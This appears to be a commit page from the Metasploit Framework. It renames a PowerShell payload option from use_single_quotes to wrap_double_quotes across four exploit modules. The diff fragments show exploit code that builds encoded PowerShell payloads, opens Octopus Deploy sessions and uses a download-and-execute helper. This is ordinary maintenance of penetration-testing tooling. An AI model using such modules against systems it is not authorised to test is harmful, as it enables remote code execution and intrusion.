Land #11660, Update use_single_quotes to wrap_double_quotes

master
Pearce Barry 2019-04-06 15:44:39 -05:00
commit 7e62a69e16
No known key found for this signature in database
GPG Key ID: DFFA791397420E6C
4 changed files with 4 additions and 4 deletions

View File

@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
# Generate the powershell payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true)
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, wrap_double_quotes: true)
step_name = datastore['STEPNAME'] || rand_text_alphanumeric(4 + rand(32 - 4))
session = create_octopus_session unless datastore['APIKEY']

View File

@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
def generate_payload_blob
opts = {
use_single_quotes: true,
wrap_double_quotes: true,
encode_final_payload: true,
}
blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first, opts).split(' ')[-1]

View File

@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
else
psh_options = { :remove_comspec => true,
:encode_inner_payload => true,
:use_single_quotes => true }
:wrap_double_quotes => true }
end
psh = cmd_psh_payload(payload.encoded,

View File

@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
self.file_contents = cmd_psh_payload( payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
use_single_quotes: true)
wrap_double_quotes: true)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)